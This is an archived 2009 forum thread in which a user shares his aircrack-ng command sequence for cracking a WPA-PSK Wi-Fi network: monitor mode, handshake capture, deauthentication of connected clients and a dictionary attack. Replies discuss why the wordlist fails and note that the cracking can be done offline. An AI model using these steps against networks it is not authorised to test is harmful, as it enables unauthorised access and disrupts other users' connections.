PDA

View Full Version : Am I cracking WPA right?



OmegaNemesis28
08-01-2009, 05:13 AM
I'm not sure if I'm doing this right.
I have an ALFA AWUS036H and I'm using the latest Backtrack 3 on USB.

This is what I've been doing. The SSID is called Motorola 985 with WPA-PSK security.

airmon-ng stop wlan1 (wlan 1 is my ALFA adapter)
airmon-ng start wlan1

airodump-ng wlan1
I get the channel and bssid from the scan.

airodump-ng -c 1 -w motorolawpa –bssid (BSSIDhere) wlan1

Open a new terminal and then wait for someone to connect.
aireplay-ng -0 20 -a (bssid) wlan1
Repeat that until it finally boots that person and says I get a handshake.

aircrack-ng motorolawpa-01.cap -w dictionaryhere

I found a dictionary that has over 4 million different keys. I've tried all 4 million. It didn't break it :(
So, either I need to find a stronger dictionary or I'm doing something wrong. And I think its the latter to be honest because.... well I have my reasons :p

KMDave
08-01-2009, 08:53 AM
Yeah, just add your password to the dictionary.

darkboy
08-01-2009, 10:02 AM
The "achilles heel" of WPA cracking using aircrack/dictionary file -is the password/passcode list. If the passcode/password isnt in the list you are using---you cannot crack it.A way forward to overcome this problem appears to be Tkiptun-ng, but there is still much work to be done to refine this approach to the problem.

portal
08-01-2009, 03:12 PM
How far is the AP away from your computer?

kazalku
08-01-2009, 11:53 PM
How far is the AP away from your computer?
This has nothing to do here.... He already has got the handshake, so his problem is now to crack it. This process can be done anywhere (even in the personal lab) and he doesn't need to be near the AP.